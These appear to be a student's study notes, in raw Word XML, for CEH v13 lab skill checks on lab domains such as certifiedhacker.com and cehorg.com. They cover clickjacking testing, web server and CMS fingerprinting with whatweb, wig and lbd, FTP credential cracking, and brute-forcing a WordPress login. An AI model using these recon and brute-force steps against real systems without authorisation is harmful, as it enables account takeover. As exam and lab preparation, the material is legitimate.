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 w16sdtfl">
  <w:body>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="607390A4" wp14:paraId="2C078E63" wp14:textId="356752BE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="45F74499">
        <w:rPr/>
        <w:t>ILab's Notes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="607390A4" w:rsidP="607390A4" w:rsidRDefault="607390A4" w14:paraId="7D1778E2" w14:textId="1F23A796">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="48CDA176">
        <w:rPr/>
        <w:t>Lab Skill Checks Part 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="607390A4" w:rsidP="4CC0B5BE" w:rsidRDefault="607390A4" w14:paraId="723F9A2B" w14:textId="4D384B6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E5DE8D1">
        <w:rPr/>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="4EB26D44" w:rsidR="6E5DE8D1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clickjacking Test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="4EB26D44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You have been assigned a task to perform a clickjacking test on </w:t>
      </w:r>
      <w:hyperlink r:id="R588c8440fb7f4e36">
        <w:r w:rsidRPr="4EB26D44" w:rsidR="26424B60">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www.certifiedhacker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="4EB26D44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that the CEHORG members widely use. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="278E0124" w:rsidP="4CC0B5BE" w:rsidRDefault="278E0124" w14:paraId="1DAEC516" w14:textId="40176AD0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3ECF6596" w:rsidR="278E0124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[[ Test code in </w:t>
      </w:r>
      <w:hyperlink r:id="R866f9de67fbd46eb">
        <w:r w:rsidRPr="3ECF6596" w:rsidR="278E0124">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking.md at master · OWASP/www-project-web-security-testing-guide · GitHub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="278E0124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]]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="348DB001" w:rsidP="3ECF6596" w:rsidRDefault="348DB001" w14:paraId="10346185" w14:textId="4967ADE9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3ECF6596" w:rsidR="348DB001">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Or ,</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="348DB001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use Ghosteye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CC0B5BE" w:rsidP="4CC0B5BE" w:rsidRDefault="4CC0B5BE" w14:paraId="455E16A7" w14:textId="1780A251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</w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="69CD7092" w14:textId="0BD93E52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>1.2 HTTP Recon – Nginx Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="7759E3DD" w14:textId="4A829D2B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Perform an HTTP-recon on </w:t>
      </w:r>
      <w:hyperlink r:id="R53ff82d5747240e9">
        <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www.certifiedhacker.com</w:t>
        </w:r>
      </w:hyperlink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and find out the version of Nginx used by the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32DCA6F7" w:rsidP="4CC0B5BE" w:rsidRDefault="32DCA6F7" w14:paraId="2B367F8C" w14:textId="1F0ABAD5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32DCA6F7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E drive-&gt; CH Tools-&gt; Web servers-&gt;httprecon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32DCA6F7" w:rsidP="4CC0B5BE" w:rsidRDefault="32DCA6F7" w14:paraId="3E7B12A6" w14:textId="4C2ED374">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="32DCA6F7">
        <w:drawing>
          <wp:inline wp14:editId="6EC879D7" wp14:anchorId="667A3F23">
            <wp:extent cx="3833522" cy="4229100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148625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ff6f9122e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22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0B5BE" w:rsidP="4CC0B5BE" w:rsidRDefault="4CC0B5BE" w14:paraId="7EF46AAA" w14:textId="0D88387B">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2CA0E4A5" w:rsidP="4CC0B5BE" w:rsidRDefault="2CA0E4A5" w14:paraId="25846809" w14:textId="0667AD1B">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="2CA0E4A5">
        <w:rPr/>
        <w:t>OR,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CA0E4A5" w:rsidP="4CC0B5BE" w:rsidRDefault="2CA0E4A5" w14:paraId="15A159CD" w14:textId="67A90BA7">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="2CA0E4A5">
        <w:rPr/>
        <w:t xml:space="preserve">whatweb </w:t>
      </w:r>
      <w:r w:rsidR="2CA0E4A5">
        <w:rPr/>
        <w:t>https://certifiedhacker.com/P-folio/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CC0B5BE" w:rsidP="4CC0B5BE" w:rsidRDefault="4CC0B5BE" w14:paraId="410D6C14" w14:textId="78C29DB6">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="660FA566" w14:textId="2E34209C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>1.3 FTP Credentials &amp; flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="7D68F279" w14:textId="74D3B713">
      <w:pPr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Crack the FTP credentials, obtain the "flag.txt" file and </w:t>
      </w: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>determine</w:t>
      </w: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the content in the file.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60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Input</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aaaaaaa</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*AAA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2354D4AD" w:rsidP="5787A77D" w:rsidRDefault="2354D4AD" w14:paraId="642B1CDA" w14:textId="113D2A8E">
      <w:pPr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3ECF6596" w:rsidR="2354D4AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>***Password will be provided in home/attacker/Desktop/</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="2354D4AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wordlist</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="5F76645B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or in parrot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42CCDEDB" w:rsidP="5787A77D" w:rsidRDefault="42CCDEDB" w14:paraId="434B2815" w14:textId="245C6A91">
      <w:pPr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5787A77D" w:rsidR="42CCDEDB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Or,</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="42CCDEDB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> E-&gt; CEH Tools\CEH v13 Lab\CEHv13 </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="42CCDEDB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module 13 Hacking Web Servers\Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="11E33FE7" w14:textId="794F5294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>1.4 Web Recon – HTTP Server (movies.cehorg.com)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="4F45F2B5" w14:textId="62852CC6">
      <w:pPr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>Find out the HTTP server used by the web application.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60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Input</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aaaaaaaa</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-AAA/</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NN.N</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E5A1F61" w:rsidP="4CC0B5BE" w:rsidRDefault="5E5A1F61" w14:paraId="391FB13D" w14:textId="175D15E7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3ECF6596" w:rsidR="5E5A1F61">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E drive-&gt; CH Tools-&gt; Web servers-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="5E5A1F61">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>httprecon</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="5E5A1F61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or parrot terminal use </w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="5E5A1F61">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whatweb</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="5E5A1F61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link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4FD4B0DD" w:rsidP="3ECF6596" w:rsidRDefault="4FD4B0DD" w14:paraId="372C2AE3" w14:textId="2ED5DBC5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3ECF6596" w:rsidR="4FD4B0DD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For </w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="4FD4B0DD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nginx,http</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="4FD4B0DD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server-&gt; use whatweb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E5A1F61" w:rsidP="4CC0B5BE" w:rsidRDefault="5E5A1F61" w14:paraId="67671A14" w14:textId="6F050F95">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="5E5A1F61">
        <w:drawing>
          <wp:inline wp14:editId="3CCB7A89" wp14:anchorId="3425663B">
            <wp:extent cx="4687330" cy="3676650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1412771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ad88b2ac2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3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424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="2A6B86AE" w14:textId="5D400F21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noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.5 Load Balancing Service (eccouncil.org)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26424B60" w:rsidP="4CC0B5BE" w:rsidRDefault="26424B60" w14:paraId="09214F49" w14:textId="260F892A">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60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Identify</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60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the load balancing service used by eccouncil.org.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60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4CC0B5BE" w:rsidR="26424B60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Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="26424B60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4CC0B5BE" w:rsidR="26424B60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aaaaaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="495EC2AE" w:rsidP="4CC0B5BE" w:rsidRDefault="495EC2AE" w14:paraId="16CBB791" w14:textId="379FB3F0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ECF6596" w:rsidR="495EC2AE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Look for </w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="495EC2AE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firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="512C37B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/ids-</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="512C37B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ips</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="495EC2AE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. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="495EC2AE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wappalyzer</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="495EC2AE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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282CB804" w:rsidP="3ECF6596" w:rsidRDefault="282CB804" w14:paraId="618147D0" w14:textId="670943C0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ECF6596" w:rsidR="282CB80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0r,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282CB804" w:rsidP="3ECF6596" w:rsidRDefault="282CB804" w14:paraId="7AB4665D" w14:textId="20F44B47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ECF6596" w:rsidR="282CB80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--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="282CB80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lbd</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="282CB80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ec.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E63F083" w:rsidP="4CC0B5BE" w:rsidRDefault="4E63F083" w14:paraId="31EF8DD0" w14:textId="16D970D2">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="4E63F083">
        <w:drawing>
          <wp:inline wp14:editId="256DE708" wp14:anchorId="242C4801">
            <wp:extent cx="3674591" cy="2343152"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175147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711b46d15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591" cy="23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0B5BE" w:rsidP="4CC0B5BE" w:rsidRDefault="4CC0B5BE" w14:paraId="40B04D92" w14:textId="031B4CBC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</w:p>
    <w:p w:rsidR="30046EA8" w:rsidP="4CC0B5BE" w:rsidRDefault="30046EA8" w14:paraId="454DC9B4" w14:textId="3A95312D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4CC0B5BE" w:rsidR="30046EA8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1.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="30046EA8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Identify the Content Management System used by </w:t>
      </w:r>
      <w:hyperlink r:id="Rb8876886024e477c">
        <w:r w:rsidRPr="4CC0B5BE" w:rsidR="30046EA8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www.cehorg.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="30046EA8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.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="30046EA8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4CC0B5BE" w:rsidR="30046EA8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Input Format:</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="30046EA8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AaaaAaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6274BE2C" w:rsidP="4CC0B5BE" w:rsidRDefault="6274BE2C" w14:paraId="4CFC5B4C" w14:textId="1D6C1D7D">
      <w:pPr>
        <w:pStyle w:val="Normal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4CC0B5BE" w:rsidR="6274BE2C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6274BE2C" w:rsidP="4CC0B5BE" w:rsidRDefault="6274BE2C" w14:paraId="0D96C73E" w14:textId="54E22241">
      <w:pPr>
        <w:pStyle w:val="Normal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3ECF6596" w:rsidR="6274BE2C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use :</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="6274BE2C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="6274BE2C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whatweb</w:t>
      </w:r>
      <w:r w:rsidRPr="3ECF6596" w:rsidR="6274BE2C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F59436F" w:rsidP="3ECF6596" w:rsidRDefault="0F59436F" w14:paraId="3EDE766A" w14:textId="5F134064">
      <w:pPr>
        <w:pStyle w:val="Normal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3ECF6596" w:rsidR="0F59436F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Or,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F59436F" w:rsidP="3ECF6596" w:rsidRDefault="0F59436F" w14:paraId="229E0132" w14:textId="30E4EE12">
      <w:pPr>
        <w:pStyle w:val="Normal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3ECF6596" w:rsidR="0F59436F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt; wig www.eccounsil.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6274BE2C" w:rsidRDefault="6274BE2C" w14:paraId="11AFD269" w14:textId="538B81F0">
      <w:r w:rsidR="6274BE2C">
        <w:drawing>
          <wp:inline wp14:editId="2B5F4EDA" wp14:anchorId="1194F4F1">
            <wp:extent cx="5943600" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="678106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137afb846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46EA8" w:rsidP="4CC0B5BE" w:rsidRDefault="30046EA8" w14:paraId="0242FC77" w14:textId="049CF372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1.7 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Perform a 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bruteforce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attack on </w:t>
      </w:r>
      <w:hyperlink r:id="Rfc8f474bdbbf4b39">
        <w:r w:rsidRPr="4CC0B5BE" w:rsidR="30046EA8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0"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www.cehorg.com</w:t>
        </w:r>
      </w:hyperlink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and find the password of user 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adam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.</w:t>
      </w:r>
      <w:r>
        <w:br/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Input Format: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4CC0B5BE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aaaaaaaNNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="614C8DF4" w:rsidP="4CC0B5BE" w:rsidRDefault="614C8DF4" w14:paraId="410EA918" w14:textId="07B02E17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4CC0B5BE" w:rsidR="614C8DF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**Search for default login page/</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="614C8DF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url</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="614C8DF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if no login page is provided</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="614C8DF4" w:rsidP="4CC0B5BE" w:rsidRDefault="614C8DF4" w14:paraId="5F3BC3B0" w14:textId="5D8F4ADD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4CC0B5BE" w:rsidR="614C8DF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Some default </w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="614C8DF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urls</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="614C8DF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are:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="48AF84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-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="48AF84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http://&lt;domain&gt;/wp-admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48AF8448" w:rsidP="4CC0B5BE" w:rsidRDefault="48AF8448" w14:paraId="40A3C422" w14:textId="2C185EE5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4CC0B5BE" w:rsidR="48AF84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-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="48AF84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http://&lt;domain&gt;/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="48AF8448" w:rsidP="4CC0B5BE" w:rsidRDefault="48AF8448" w14:paraId="18C10259" w14:textId="11DBAFBA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4CC0B5BE" w:rsidR="48AF84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-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="6AA3453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/wp-admin/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6AA34534" w:rsidP="4CC0B5BE" w:rsidRDefault="6AA34534" w14:paraId="21C123D4" w14:textId="3B0A06B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="4CC0B5BE" w:rsidR="6AA3453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-&gt;/login/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CC0B5BE" w:rsidP="4CC0B5BE" w:rsidRDefault="4CC0B5BE" w14:paraId="6D82993A" w14:textId="5FF951FE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</w:p>
    <w:p w:rsidR="6AA34534" w:rsidP="4CC0B5BE" w:rsidRDefault="6AA34534" w14:paraId="447337BF" w14:textId="6045D238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6AA3453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Then </w:t>
      </w:r>
      <w:r w:rsidRPr="3D074322" w:rsidR="4959EA6C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bruteforce</w:t>
      </w:r>
    </w:p>
